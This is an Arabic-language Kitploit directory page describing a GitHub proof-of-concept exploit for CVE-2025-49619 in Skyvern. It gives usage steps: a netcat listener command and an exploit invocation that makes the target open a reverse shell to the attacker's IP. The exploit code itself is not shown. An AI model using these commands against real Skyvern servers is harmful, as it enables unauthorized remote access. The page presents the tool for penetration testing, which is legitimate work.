Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-49619 — يستغل هذا السكربت ثغرة CVE-2025-49619 في Skyvern لتنفيذ أمر قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/cristibtz/cve-2025-49619
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubcristibtz/cve-2025-49619

CVE-2025-49619

يستغل هذا السكربت ثغرة CVE-2025-49619 في Skyvern لتنفيذ أمر قشرة عكسية.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-49619 PoC


يستغل هذا السكربت ثغرة CVE-2025-49619 في Skyvern لتنفيذ أمر قشرة عكسية (reverse shell).


المؤلف

  • الاسم: Cristian Branet
  • GitHub: cristibtz

الاستخدام

1. تشغيل مستمع (Listener)

root@kitploit:~
nc -lvnp <PORT>

2. تشغيل الاستغلال

root@kitploit:~
python3 exploit.py -u "http://<TARGET_IP>:<TARGET_PORT>" -k "<X-API-KEY>" -i <LOCAL_IP> -p <PORT>
  • <TARGET_IP>: عنوان IP لخادم Skyvern
  • <TARGET_PORT>: منفذ خادم Skyvern
  • <X-API-KEY>: مفتاح API الخاص بـ Skyvern (الإعدادات ← مفتاح API)
  • <LOCAL_IP>: عنوان IP الخاص بك لاستقبال القشرة العكسية
  • <PORT>: المنفذ للقشرة العكسية (يجب أن يطابق المستمع الخاص بك)

إخلاء مسؤولية:
هذا الكود مخصص لأغراض تعليمية وللاختبار المصرح به فقط.

تنزيل الأداة